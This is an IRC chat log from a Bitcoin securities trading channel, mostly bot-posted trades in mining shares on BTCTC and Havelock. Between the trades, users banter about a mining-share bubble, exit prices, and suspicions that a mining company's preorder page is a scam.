22:03:46 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003914 = 0.0196 BTC [-] Jul 12 22:03:47 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.003914 = 0.0665 BTC [-] Jul 12 22:04:29 is there a specific reason? Jul 12 22:04:41 [BTCTC] [AMC-PT] 125 @ 0.0025 = 0.3125 BTC [+] Jul 12 22:05:41 all mining stuff is in a bubble Jul 12 22:05:43 I bought into basic Jul 12 22:05:55 [BTCTC] [BASIC-MINING] 1 @ 0.9 BTC [+] Jul 12 22:06:01 already made back 200%, not sure when my cut off point is Jul 12 22:06:01 [BTCTC] [ASICMINER-PT] 1 @ 4.202001 BTC [-] Jul 12 22:07:41 [HAVELOCK] [SDSTM] 9 @ 0.013 = 0.117 BTC [-] Jul 12 22:07:43 [HAVELOCK] [SDSTM] 10 @ 0.0125 = 0.125 BTC [-] Jul 12 22:07:44 [HAVELOCK] [SDSTM] 98 @ 0.01201001 = 1.177 BTC [-] Jul 12 22:07:44 that's unsafe Rulother. Jul 12 22:07:48 you decide in advance. Jul 12 22:07:51 [BTCTC] [PAJKA.BOND] 1 @ 0.047008 BTC [-] Jul 12 22:07:57 4x 60 gh/s units arrived today Jul 12 22:08:06 For basic? Jul 12 22:08:09 yes Jul 12 22:08:11 Ah Jul 12 22:08:17 My cut off is 1.8 then Jul 12 22:08:36 great to hear Jul 12 22:08:39 o yeah Jul 12 22:09:12 [BTCTC] [PAJKA.BOND] 4 @ 0.047 = 0.188 BTC [-] Jul 12 22:09:51 Well they still got around 100 coming as well so I feel 1.8 is safe Jul 12 22:09:55 [BTCTC] [BASIC-MINING] 1 @ 0.88 BTC [-] Jul 12 22:10:26 [BTCTC] [BASIC-MINING] 1 @ 0.82 BTC [-] Jul 12 22:10:28 [BTCTC] [BASIC-MINING] 1 @ 0.801 BTC [-] Jul 12 22:10:33 I thought BM was dead? Jul 12 22:10:34 [BTCTC] [BASIC-MINING] 16 @ 0.88 = 14.08 BTC [+] Jul 12 22:10:34 [BTCTC] [BASIC-MINING] 9 @ 0.888888 = 8 BTC [+] Jul 12 22:10:35 [BTCTC] [BASIC-MINING] 9 @ 0.9 = 8.1 BTC [+] Jul 12 22:10:35 Dead and gone Jul 12 22:10:36 [BTCTC] [BASIC-MINING] 10 @ 0.91 = 9.1 BTC [+] Jul 12 22:10:38 [BTCTC] [BASIC-MINING] 10 @ 0.92 = 9.2 BTC [+] Jul 12 22:10:39 [BTCTC] [BASIC-MINING] 1 @ 0.925 BTC [+] Jul 12 22:10:40 [BTCTC] [BASIC-MINING] 5 @ 0.9497 = 4.7485 BTC [+] Jul 12 22:10:42 [BTCTC] [BASIC-MINING] 84 @ 0.9498 = 79.7832 BTC [+] Jul 12 22:10:42 there are also 1000 btc reserve.. Jul 12 22:10:46 GUESS NOT Jul 12 22:10:49 lol Jul 12 22:11:05 I missed that boat *glares at smickles_* Jul 12 22:12:28 arent there two BASICs? Jul 12 22:12:34 one is just a mining fund Jul 12 22:12:41 and one that died trying to make asics? Jul 12 22:13:15 i think u refer to bASIC Jul 12 22:13:21 if i recall correctly Jul 12 22:13:31 yeah that Jul 12 22:13:52 [HAVELOCK] [SDSTM] 2 @ 0.01201001 = 0.024 BTC [-] Jul 12 22:13:55 that's what I was thinking of the one that died trying to make asics Jul 12 22:14:05 were they not under the same mgmt? Jul 12 22:14:19 no idea Jul 12 22:14:24 i doubt they are related Jul 12 22:14:44 [HAVELOCK] [SDSTM] 48 @ 0.01201 = 0.5765 BTC [-] Jul 12 22:16:01 [BTCTC] [DMS.SELLING] 75 @ 0.026999 = 2.0249 BTC [-] Jul 12 22:17:02 [BTCTC] [DMS.MINING] 20 @ 0.0142 = 0.284 BTC [+] Jul 12 22:17:03 [BTCTC] [DMS.MINING] 50 @ 0.014101 = 0.7051 BTC [-] Jul 12 22:17:25 [BTCTC] [DMS.MINING] 5 @ 0.014003 = 0.07 BTC [-] Jul 12 22:17:51 [BTCTC] [DMS.PURCHASE] 76 @ 0.040366 = 3.0678 BTC [-] Jul 12 22:17:59 [BTCTC] [DMS.SELLING] 22 @ 0.027499 = 0.605 BTC [+] Jul 12 22:18:01 [BTCTC] [DMS.SELLING] 8 @ 0.0275 = 0.22 BTC [+] Jul 12 22:18:15 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004144 BTC [+] Jul 12 22:19:06 [BTCTC] [AMC-PT] 150 @ 0.0025 = 0.375 BTC [+] Jul 12 22:19:50 they aren't Jul 12 22:21:07 [BTCTC] [BASIC-MINING] 1 @ 0.91 BTC [-] Jul 12 22:21:46 [BTCTC] [BASIC-MINING] 3 @ 0.9443 = 2.8329 BTC [+] Jul 12 22:22:27 [BTCTC] [BASIC-MINING] 3 @ 0.9449 = 2.8347 BTC [+] Jul 12 22:22:54 [BTCTC] [DMS.MINING] 1 @ 0.014003 BTC [-] Jul 12 22:22:57 [BTCTC] [DMS.MINING] 4 @ 0.014003 = 0.056 BTC [-] Jul 12 22:22:59 [BTCTC] [DMS.MINING] 3 @ 0.014001 = 0.042 BTC [-] Jul 12 22:25:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.042474 = 0.2124 BTC [+] Jul 12 22:27:01 [BTCTC] [ASICMINER-PT] 1 @ 4.269988 BTC [+] Jul 12 22:28:16 [BTCTC] [ASICMINER-PT] 1 @ 4.202001 BTC [-] Jul 12 22:28:57 [BTCTC] [PAJKA.BOND] 1 @ 0.047 BTC [-] Jul 12 22:29:38 [BTCTC] [ASICMINER-PT] 1 @ 4.269989 BTC [+] Jul 12 22:31:01 i doubt they are related << afaik they're unrelated. Jul 12 22:31:24 http://i.imgur.com/ImEX0Tc.png Jul 12 22:31:56 [BTCTC] [ASICMINER-PT] 1 @ 4.26999 BTC [+] Jul 12 22:32:31 [BTCTC] [BASIC-MINING] 12 @ 0.8 = 9.6 BTC [-] Jul 12 22:33:13 [BTCTC] [ASICMINER-PT] 1 @ 4.26 BTC [-] Jul 12 22:33:16 [BTCTC] [ASICMINER-PT] 2 @ 4.26 = 8.52 BTC [-] Jul 12 22:33:33 [BTCTC] [ASICMINER-PT] 1 @ 4.203 BTC [-] Jul 12 22:33:58 [BTCTC] [ASICMINER-PT] 1 @ 4.202009 BTC [-] Jul 12 22:34:00 [BTCTC] [ASICMINER-PT] 1 @ 4.202 BTC [-] Jul 12 22:34:03 [BTCTC] [ASICMINER-PT] 1 @ 4.200002 BTC [-] Jul 12 22:34:21 [BTCTC] [ASICMINER-PT] 1 @ 4.200001 BTC [-] Jul 12 22:34:22 [BTCTC] [TAT.ASICMINER] 11 @ 0.041211 = 0.4533 BTC [-] Jul 12 22:34:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.042291 BTC [+] Jul 12 22:35:23 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 12 22:36:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.041212 = 0.2061 BTC [-] Jul 12 22:36:21 [BTCTC] [BASIC-MINING] 3 @ 0.9 = 2.7 BTC [+] Jul 12 22:36:23 [BTCTC] [BASIC-MINING] 12 @ 0.9 = 10.8 BTC [+] Jul 12 22:36:25 [BTCTC] [BASIC-MINING] 1 @ 0.905 BTC [+] Jul 12 22:36:26 [BTCTC] [BASIC-MINING] 1 @ 0.91 BTC [+] Jul 12 22:36:28 [BTCTC] [BASIC-MINING] 10 @ 0.929 = 9.29 BTC [+] Jul 12 22:38:06 [BTCTC] [DMS.PURCHASE] 15 @ 0.040366 = 0.6055 BTC [-] Jul 12 22:39:22 [15:31] http://i.imgur.com/ImEX0Tc.png <<< people are so retarded Jul 12 22:39:42 they focus on the most irrelevant problems Jul 12 22:39:56 all their arguments amount to "but, me!" Jul 12 22:40:22 the best part is "sounds like scam" imho Jul 12 22:41:08 other people's money! scams! Jul 12 22:41:17 said the "investor" Jul 12 22:41:33 TAT, you need some RES. Jul 12 22:41:55 http://redditenhancementsuite.com/ Jul 12 22:41:56 Reddit Enhancement Suite Jul 12 22:42:09 i mean, pox2 Jul 12 22:42:13 sry TAT Jul 12 22:42:17 yes Jul 12 22:42:22 default reddit makes eyes bleed. Jul 12 22:43:09 they even take bitcoin ;) Jul 12 22:43:20 [HAVELOCK] [SDSTM] 100 @ 0.01211 = 1.211 BTC [+] Jul 12 22:44:13 [BTCTC] [DMS.SELLING] 8 @ 0.027389 = 0.2191 BTC [-] Jul 12 22:44:20 [BTCTC] [DMS.SELLING] 4 @ 0.027389 = 0.1096 BTC [-] Jul 12 22:46:33 interesting... the night mode is too dark though :) Jul 12 22:47:23 [BTCTC] [DMS.SELLING] 8 @ 0.027389 = 0.2191 BTC [-] Jul 12 22:47:25 [BTCTC] [DMS.SELLING] 100 @ 0.02739 = 2.739 BTC [+] Jul 12 22:47:26 [BTCTC] [DMS.SELLING] 7 @ 0.0274 = 0.1918 BTC [+] Jul 12 22:51:29 [BTCTC] [AMC-PT] 70 @ 0.00249 = 0.1743 BTC [-] Jul 12 22:52:01 [BTCTC] [AMC-PT] 980 @ 0.00249 = 2.4402 BTC [-] Jul 12 22:52:02 [BTCTC] [AMC-PT] 320 @ 0.0025 = 0.8 BTC [+] Jul 12 22:52:06 [HAVELOCK] [AM100] 23 @ 0.0403 = 0.9269 BTC [+] Jul 12 22:53:54 [HAVELOCK] [AM100] 33 @ 0.040301 = 1.3299 BTC [+] Jul 12 22:53:56 [HAVELOCK] [AM100] 17 @ 0.040301 = 0.6851 BTC [+] Jul 12 22:54:25 [BTCTC] [BASIC-MINING] 1 @ 0.925 BTC [-] Jul 12 22:54:56 [HAVELOCK] [AM100] 18 @ 0.040301 = 0.7254 BTC [+] Jul 12 22:54:58 [HAVELOCK] [AM100] 12 @ 0.040301 = 0.4836 BTC [+] Jul 12 22:55:02 [BTCTC] [DMS.PURCHASE] 14 @ 0.040366 = 0.5651 BTC [-] Jul 12 22:55:04 [HAVELOCK] [AM100] 9 @ 0.040301 = 0.3627 BTC [+] Jul 12 22:56:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.041213 BTC [+] Jul 12 22:57:22 [BTCTC] [ASICMINER-PT] 1 @ 4.162001 BTC [-] Jul 12 22:57:59 [BTCTC] [BASIC-MINING] 1 @ 0.925 BTC [-] Jul 12 22:59:37 [BTCTC] [BASIC-MINING] 5 @ 0.81 = 4.05 BTC [-] Jul 12 22:59:39 [BTCTC] [BASIC-MINING] 1 @ 0.801 BTC [-] Jul 12 22:59:40 [BTCTC] [BASIC-MINING] 13 @ 0.8 = 10.4 BTC [-] Jul 12 23:00:24 [BTCTC] [BASIC-MINING] 5 @ 0.8 = 4 BTC [-] Jul 12 23:00:42 [BTCTC] [S.DICE-PT] 38 @ 0.002041 = 0.0776 BTC [-] Jul 12 23:00:48 [BTCTC] [BASIC-MINING] 15 @ 0.8 = 12 BTC [-] Jul 12 23:01:19 [BTCTC] [COGNITIVE] 1 @ 0.465398 BTC [+] Jul 12 23:01:48 [BTCTC] [ASICMINER-PT] 1 @ 4.162001 BTC [-] Jul 12 23:01:49 [BTCTC] [ASICMINER-PT] 2 @ 4.162 = 8.324 BTC [-] Jul 12 23:01:51 [BTCTC] [ASICMINER-PT] 1 @ 4.161 BTC [-] Jul 12 23:01:53 [BTCTC] [ASICMINER-PT] 1 @ 4.152001 BTC [-] Jul 12 23:01:56 [BTCTC] [DMS.SELLING] 1 @ 0.027399 BTC [-] Jul 12 23:02:18 [BTCTC] [BASIC-MINING] 1 @ 0.8 BTC [-] Jul 12 23:02:53 [BTCTC] [BFMINES] 1 @ 0.00399 BTC [+] Jul 12 23:02:55 [MPEX] [S.MPOE] 2555 @ 0.00082587 = 2.1101 BTC [+] Jul 12 23:03:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.041213 = 0.1649 BTC [+] Jul 12 23:03:41 [BTCTC] [BTC-BOND] 10 @ 0.009995 = 0.1 BTC [-] Jul 12 23:04:40 [BTCTC] [BITVPS] 25 @ 0.00219 = 0.0548 BTC [+] Jul 12 23:04:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.04121 = 0.0824 BTC [-] Jul 12 23:04:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.041209 = 0.1236 BTC [-] Jul 12 23:05:30 [BTCTC] [BTC-BOND] 2 @ 0.009996 = 0.02 BTC [+] Jul 12 23:05:56 [BTCTC] [BITVPS] 200 @ 0.00219 = 0.438 BTC [+] Jul 12 23:06:20 [BTCTC] [BTC-BOND] 1 @ 0.009996 BTC [+] Jul 12 23:06:57 [BTCTC] [DMS.MINING] 2 @ 0.014001 = 0.028 BTC [-] Jul 12 23:06:59 [BTCTC] [DMS.MINING] 5 @ 0.014001 = 0.07 BTC [-] Jul 12 23:07:01 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [+] Jul 12 23:07:09 [BTCTC] [BITVPS] 58 @ 0.00219 = 0.127 BTC [+] Jul 12 23:07:11 [HAVELOCK] [AM100] 11 @ 0.0403 = 0.4433 BTC [-] Jul 12 23:07:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.041209 = 0.1236 BTC [-] Jul 12 23:07:56 [BTCTC] [BASIC-MINING] 1 @ 0.867 BTC [+] Jul 12 23:08:27 [BTCTC] [AMC-PT] 275 @ 0.0025 = 0.6875 BTC [+] Jul 12 23:08:59 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004144 = 0.0124 BTC [+] Jul 12 23:10:18 [HAVELOCK] [SDSTM] 1 @ 0.0127 BTC [+] Jul 12 23:10:26 [HAVELOCK] [SDSTM] 5 @ 0.01211 = 0.0606 BTC [-] Jul 12 23:10:34 [HAVELOCK] [SDSTM] 2 @ 0.01201 = 0.024 BTC [-] Jul 12 23:10:40 [BTCTC] [BFMINES] 5 @ 0.00399 = 0.02 BTC [+] Jul 12 23:10:41 [HAVELOCK] [SDSTM] 10 @ 0.012 = 0.12 BTC [-] Jul 12 23:10:45 [HAVELOCK] [SDSTM] 9 @ 0.012 = 0.108 BTC [-] Jul 12 23:10:50 [HAVELOCK] [SDSTM] 1 @ 0.0111 BTC [-] Jul 12 23:10:55 [HAVELOCK] [SDSTM] 5 @ 0.0111 = 0.0555 BTC [-] Jul 12 23:11:00 [HAVELOCK] [SDSTM] 4 @ 0.011 = 0.044 BTC [-] Jul 12 23:11:06 [HAVELOCK] [SDSTM] 10 @ 0.011 = 0.11 BTC [-] Jul 12 23:11:12 [HAVELOCK] [SDSTM] 5 @ 0.0109 = 0.0545 BTC [-] Jul 12 23:11:17 [HAVELOCK] [SDSTM] 10 @ 0.0104 = 0.104 BTC [-] Jul 12 23:11:21 [HAVELOCK] [SDSTM] 1 @ 0.010302 BTC [-] Jul 12 23:11:29 [HAVELOCK] [SDSTM] 100 @ 0.010301 = 1.0301 BTC [-] Jul 12 23:11:33 [BTCTC] [BASIC-MINING] 1 @ 0.780001 BTC [-] Jul 12 23:11:35 [HAVELOCK] [SDSTM] 5 @ 0.01025 = 0.0513 BTC [-] Jul 12 23:11:45 [HAVELOCK] [SDSTM] 75 @ 0.0101 = 0.7575 BTC [-] Jul 12 23:11:46 [HAVELOCK] [SDSTM] 43 @ 0.0101 = 0.4343 BTC [-] Jul 12 23:12:19 [BTCTC] [DMS.MINING] 15 @ 0.014001 = 0.21 BTC [-] Jul 12 23:12:21 [BTCTC] [DMS.MINING] 4 @ 0.014001 = 0.056 BTC [-] Jul 12 23:12:21 [BTCTC] [DMS.MINING] 10 @ 0.014001 = 0.14 BTC [-] Jul 12 23:12:23 [BTCTC] [DMS.MINING] 10 @ 0.014 = 0.14 BTC [-] Jul 12 23:12:24 [BTCTC] [DMS.MINING] 40 @ 0.014 = 0.56 BTC [-] Jul 12 23:12:26 [BTCTC] [DMS.MINING] 9 @ 0.014 = 0.126 BTC [-] Jul 12 23:12:27 [BTCTC] [DMS.MINING] 17 @ 0.014 = 0.238 BTC [-] Jul 12 23:12:34 [HAVELOCK] [SDSTM] 56 @ 0.010001 = 0.5601 BTC [-] Jul 12 23:12:42 [BTCTC] [BASIC-MINING] 9 @ 0.79 = 7.11 BTC [+] Jul 12 23:13:15 [HAVELOCK] [SDSTM] 144 @ 0.010001 = 1.4401 BTC [-] Jul 12 23:13:17 [BTCTC] [DMS.PURCHASE] 100 @ 0.040366 = 4.0366 BTC [-] Jul 12 23:13:24 [HAVELOCK] [SDSTM] 267 @ 0.01 = 2.67 BTC [-] Jul 12 23:13:25 [HAVELOCK] [SDSTM] 200 @ 0.01 = 2 BTC [-] Jul 12 23:13:26 [HAVELOCK] [SDSTM] 200 @ 0.01 = 2 BTC [-] Jul 12 23:13:28 [HAVELOCK] [AM100] 5 @ 0.04088 = 0.2044 BTC [+] Jul 12 23:13:43 [HAVELOCK] [SDSTM] 5 @ 0.0096 = 0.048 BTC [-] Jul 12 23:13:44 [HAVELOCK] [SDSTM] 5 @ 0.0091 = 0.0455 BTC [-] Jul 12 23:13:46 [HAVELOCK] [SDSTM] 90 @ 0.009 = 0.81 BTC [-] Jul 12 23:13:47 [HAVELOCK] [AM100] 15 @ 0.040999 = 0.615 BTC [+] Jul 12 23:13:52 [HAVELOCK] [AM100] 10 @ 0.040997 = 0.41 BTC [-] Jul 12 23:14:01 [HAVELOCK] [AM100] 2 @ 0.040997 = 0.082 BTC [-] Jul 12 23:14:12 [BTCTC] [BASIC-MINING] 10 @ 0.79 = 7.9 BTC [+] Jul 12 23:14:13 [BTCTC] [COGNITIVE] 5 @ 0.4 = 2 BTC [-] Jul 12 23:14:17 [HAVELOCK] [SDSTM] 89 @ 0.009 = 0.801 BTC [-] Jul 12 23:14:41 [BTCTC] [COGNITIVE] 1 @ 0.465399 BTC [+] Jul 12 23:17:46 [BTCTC] [BASIC-MINING] 2 @ 0.8 = 1.6 BTC [+] Jul 12 23:17:48 [BTCTC] [BASIC-MINING] 3 @ 0.790001 = 2.37 BTC [-] Jul 12 23:19:20 [BTCTC] [BASIC-MINING] 2 @ 0.8 = 1.6 BTC [+] Jul 12 23:19:32 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 12 23:19:45 [BTCTC] [ASICMINER-PT] 3 @ 4.152 = 12.456 BTC [-] Jul 12 23:20:24 [BTCTC] [BASIC-MINING] 7 @ 0.790001 = 5.53 BTC [-] Jul 12 23:20:26 [BTCTC] [BASIC-MINING] 2 @ 0.79 = 1.58 BTC [-] Jul 12 23:21:04 [BTCTC] [BASIC-MINING] 1 @ 0.79 BTC [-] Jul 12 23:21:28 [BTCTC] [BITVPS] 100 @ 0.002198 = 0.2198 BTC [+] Jul 12 23:22:11 [BTCTC] [BASIC-MINING] 1 @ 0.77 BTC [-] Jul 12 23:23:08 [BTCTC] [BASIC-MINING] 13 @ 0.8 = 10.4 BTC [+] Jul 12 23:23:10 [BTCTC] [BASIC-MINING] 9 @ 0.81 = 7.29 BTC [+] Jul 12 23:23:17 Thank god Jul 12 23:23:55 [BTCTC] [COGNITIVE] 1 @ 0.461 BTC [-] Jul 12 23:25:42 [BTCTC] [BASIC-MINING] 10 @ 0.67 = 6.7 BTC [-] Jul 12 23:26:39 [BTCTC] [DMS.MINING] 6 @ 0.013902 = 0.0834 BTC [-] Jul 12 23:26:41 [BTCTC] [DMS.MINING] 2 @ 0.013901 = 0.0278 BTC [-] Jul 12 23:26:43 [BTCTC] [DMS.MINING] 1 @ 0.013901 BTC [-] Jul 12 23:26:44 [BTCTC] [DMS.MINING] 1 @ 0.0139 BTC [-] Jul 12 23:28:17 [BTCTC] [AMC-PT] 50 @ 0.00248 = 0.124 BTC [-] Jul 12 23:28:29 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 12 23:31:39 [HAVELOCK] [AM100] 16 @ 0.040998 = 0.656 BTC [+] Jul 12 23:35:59 [BTCTC] [BASIC-MINING] 1 @ 0.68 BTC [+] Jul 12 23:36:42 [BTCTC] [BASIC-MINING] 6 @ 0.67 = 4.02 BTC [-] Jul 12 23:37:23 [HAVELOCK] [SDSTM] 100 @ 0.011 = 1.1 BTC [+] Jul 12 23:37:33 [HAVELOCK] [SDSTM] 10 @ 0.0128 = 0.128 BTC [+] Jul 12 23:37:40 [HAVELOCK] [SDSTM] 10 @ 0.014781 = 0.1478 BTC [+] Jul 12 23:37:45 [BTCTC] [AMC-PT] 70 @ 0.0025 = 0.175 BTC [+] Jul 12 23:37:48 [HAVELOCK] [SDSTM] 200 @ 0.014791 = 2.9582 BTC [+] Jul 12 23:38:37 [HAVELOCK] [SDSTM] 6 @ 0.014793 = 0.0888 BTC [+] Jul 12 23:38:44 [BTCTC] [BASIC-MINING] 1 @ 0.699999 BTC [+] Jul 12 23:38:46 [BTCTC] [BASIC-MINING] 1 @ 0.7 BTC [+] Jul 12 23:38:47 [BTCTC] [BASIC-MINING] 2 @ 0.7 = 1.4 BTC [+] Jul 12 23:40:09 [HAVELOCK] [SDSTM] 35 @ 0.014793 = 0.5178 BTC [+] Jul 12 23:40:18 [HAVELOCK] [SDSTM] 5 @ 0.014795 = 0.074 BTC [+] Jul 12 23:40:41 [BTCTC] [BASIC-MINING] 1 @ 0.73 BTC [+] Jul 12 23:40:43 [BTCTC] [BASIC-MINING] 6 @ 0.73 = 4.38 BTC [+] Jul 12 23:41:22 [BTCTC] [BASIC-MINING] 1 @ 0.74 BTC [+] Jul 12 23:42:54 [BTCTC] [TAT.ASICMINER] 17 @ 0.041991 = 0.7138 BTC [+] Jul 12 23:43:31 so sandstorm book price is about 0.001, but they are trading at 0.015, why are people so bad at math? Jul 12 23:44:21 [HAVELOCK] [SDSTM] 9 @ 0.014795 = 0.1332 BTC [+] Jul 12 23:45:12 [HAVELOCK] [SDSTM] 10 @ 0.0148 = 0.148 BTC [+] Jul 12 23:45:17 [HAVELOCK] [AM100] 228 @ 0.040998 = 9.3475 BTC [+] Jul 12 23:45:18 [HAVELOCK] [AM100] 228 @ 0.040998 = 9.3475 BTC [+] Jul 12 23:45:22 [HAVELOCK] [SDSTM] 50 @ 0.015 = 0.75 BTC [+] Jul 12 23:45:26 [HAVELOCK] [AM100] 91 @ 0.040998 = 3.7308 BTC [+] Jul 12 23:45:33 heck, if people are that eager to give their money away maybe I should reopen LIF? Jul 12 23:45:39 [HAVELOCK] [SDSTM] 300 @ 0.01589999 = 4.77 BTC [+] Jul 12 23:45:45 [BTCTC] [DMS.SELLING] 5 @ 0.027397 = 0.137 BTC [-] Jul 12 23:45:49 [BTCTC] [BTC-BOND] 18 @ 0.009996 = 0.1799 BTC [+] Jul 12 23:46:05 [HAVELOCK] [SDSTM] 30 @ 0.0159 = 0.477 BTC [+] Jul 12 23:46:34 [HAVELOCK] [SDSTM] 368 @ 0.016 = 5.888 BTC [+] Jul 12 23:46:51 [BTCTC] [BITVPS] 7 @ 0.002198 = 0.0154 BTC [+] Jul 12 23:47:01 [BTCTC] [COGNITIVE] 1 @ 0.410001 BTC [-] Jul 12 23:47:32 [BTCTC] [DMS.PURCHASE] 4 @ 0.040366 = 0.1615 BTC [-] Jul 12 23:47:51 [HAVELOCK] [AM100] 20 @ 0.040999 = 0.82 BTC [+] Jul 12 23:48:06 [BTCTC] [S.MPOE-PT] 16 @ 0.000816 = 0.0131 BTC [-] Jul 12 23:49:00 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 12 23:49:46 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 12 23:50:54 [BTCTC] [BITVPS] 18 @ 0.002198 = 0.0396 BTC [+] Jul 12 23:51:59 [BTCTC] [BMF] 5 @ 0.033 = 0.165 BTC [+] Jul 12 23:52:15 [HAVELOCK] [AM100] 3 @ 0.040999 = 0.123 BTC [+] Jul 12 23:52:19 [BTCTC] [AMC-PT] 15925 @ 0.0025 = 39.8125 BTC [+] Jul 12 23:53:11 [BTCTC] [B.YABMC] 100 @ 0.0025 = 0.25 BTC [-] Jul 12 23:57:43 [BTCTC] [DMS.SELLING] 5 @ 0.027397 = 0.137 BTC [-] Jul 13 00:00:51 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [+] Jul 13 00:01:17 [HAVELOCK] [AM100] 100 @ 0.040998 = 4.0998 BTC [-] Jul 13 00:01:32 [BTCTC] [ASICMINER-PT] 6 @ 4.2 = 25.2 BTC [+] Jul 13 00:01:36 [BTCTC] [ASICMINER-PT] 1 @ 4.165 BTC [-] Jul 13 00:01:40 [BTCTC] [ASICMINER-PT] 2 @ 4.161 = 8.322 BTC [-] Jul 13 00:03:33 [BTCTC] [BASIC-MINING] 10 @ 0.719999 = 7.2 BTC [-] Jul 13 00:03:35 [BTCTC] [BASIC-MINING] 10 @ 0.72 = 7.2 BTC [+] Jul 13 00:03:39 [BTCTC] [BASIC-MINING] 1 @ 0.724 BTC [+] Jul 13 00:03:41 [BTCTC] [DMS.PURCHASE] 6 @ 0.040366 = 0.2422 BTC [-] Jul 13 00:03:43 [BTCTC] [BASIC-MINING] 1 @ 0.725 BTC [+] Jul 13 00:03:52 AMC is taking preorders, get em while theyre not http://virtualminingcorp.com/shop1/index.php?id_product=10&controller=product#/fh_one_m256_256_gh_s_module-1_fh_one_m256_256_gh_s_module/fh_exp_case_16_pcie_slots-no_expansion_case Jul 13 00:04:38 [BTCTC] [DMS.SELLING] 5 @ 0.027397 = 0.137 BTC [-] Jul 13 00:06:25 they really could make better fake images Jul 13 00:06:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004144 BTC [+] Jul 13 00:07:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0046 BTC [+] Jul 13 00:07:06 case = chenbro 4u Jul 13 00:07:23 chip = istockphoto Jul 13 00:08:09 [BTCTC] [DMS.SELLING] 1 @ 0.027397 BTC [-] Jul 13 00:08:16 http://virtualminingcorp.com/shop1/img/p/3/2/32-large_default.jpg stolen from avalon Jul 13 00:08:19 :| Jul 13 00:08:53 [BTCTC] [DMS.SELLING] 3 @ 0.027397 = 0.0822 BTC [-] Jul 13 00:09:01 [HAVELOCK] [AM100] 32 @ 0.041 = 1.312 BTC [+] Jul 13 00:09:07 >_< Jul 13 00:09:16 I wonder if AMC will end up being the highest cash-value scam in the history of bitcoin Jul 13 00:09:17 looks fishy Jul 13 00:10:14 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jul 13 00:10:16 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jul 13 00:11:26 Jul 13 00:11:55 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jul 13 00:12:38 but people know who those guys are right? Jul 13 00:12:51 aren't they woried for their lives? Jul 13 00:13:11 [HAVELOCK] [AM100] 200 @ 0.040998 = 8.1996 BTC [-] Jul 13 00:13:27 though, the scammed deserve to be scammed :p Jul 13 00:13:42 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jul 13 00:13:59 [BTCTC] [BASIC-MINING] 5 @ 0.75 = 3.75 BTC [+] Jul 13 00:14:08 they have balls i guess Jul 13 00:14:39 last thing i'd want is these crazed forum superstars knocking on my door Jul 13 00:14:42 [BTCTC] [DMS.SELLING] 67 @ 0.027397 = 1.8356 BTC [-] Jul 13 00:14:46 scam or no scam Jul 13 00:14:54 buy protection Jul 13 00:15:02 super stars lol Jul 13 00:15:08 i stole the term Jul 13 00:15:09 call deborah morgan Jul 13 00:15:12 she can handle it Jul 13 00:15:13 [BTCTC] [DMS.MINING] 67 @ 0.014 = 0.938 BTC [+] Jul 13 00:15:14 hehe Jul 13 00:15:25 well let's see... knc, bitfury and btcman will be in spotlight soon too Jul 13 00:15:34 I have cats, what do i have to fear? Jul 13 00:15:52 [BTCTC] [DMS.MINING] 1 @ 0.014399 BTC [+] Jul 13 00:15:56 they even growl when cars pull up Jul 13 00:16:03 lol Jul 13 00:16:38 [BTCTC] [ASICMINER-PT] 1 @ 4.22 BTC [+] Jul 13 00:16:41 sympathy level +10 Jul 13 00:16:42 http://www.ohspress.com/wolbert/student_files/wd_2012-13_hof/christie_hadassah/critics/images/superstar2.jpg Jul 13 00:17:22 [BTCTC] [ASICMINER-PT] 1 @ 4.239999 BTC [+] Jul 13 00:17:42 [BTCTC] [COGNITIVE] 1 @ 0.41 BTC [-] Jul 13 00:17:54 [BTCTC] [ASICMINER-PT] 2 @ 4.24 = 8.48 BTC [+] Jul 13 00:18:10 [BTCTC] [BASIC-MINING] 1 @ 0.75 BTC [+] Jul 13 00:19:00 [BTCTC] [BASIC-MINING] 2 @ 0.8 = 1.6 BTC [+] Jul 13 00:19:11 [BTCTC] [BASIC-MINING] 3 @ 0.8 = 2.4 BTC [+] Jul 13 00:20:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0419 BTC [-] Jul 13 00:22:14 tat.am100's orderbook looks soo thin.. Jul 13 00:22:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.041899 BTC [-] Jul 13 00:23:14 hope some good news come soon Jul 13 00:23:43 not a lot of people filling asks for a week now Jul 13 00:24:02 any notable selloff could tumble the price everywhere, Jul 13 00:24:16 remember that BTCT does soft bids Jul 13 00:24:35 so if people have bids on both AM-PT and TAT.AM Jul 13 00:24:45 if one sells off, the other book thins Jul 13 00:25:01 [BTCTC] [BASIC-MINING] 1 @ 0.829999 BTC [+] Jul 13 00:25:08 people seem to use BTCT as the price index for AM now Jul 13 00:25:09 yeah.. Jul 13 00:25:14 so it affects all the exchanges Jul 13 00:25:51 it's quite steady though, not much range, but a slow decrease Jul 13 00:26:04 I would switch over, but frankly I make too much money off BTCT and I don't see enough traffic to make the switch Jul 13 00:26:13 to havelock? Jul 13 00:26:16 yeah Jul 13 00:26:22 itll get better over time Jul 13 00:26:26 [BTCTC] [BASIC-MINING] 1 @ 0.83 BTC [+] Jul 13 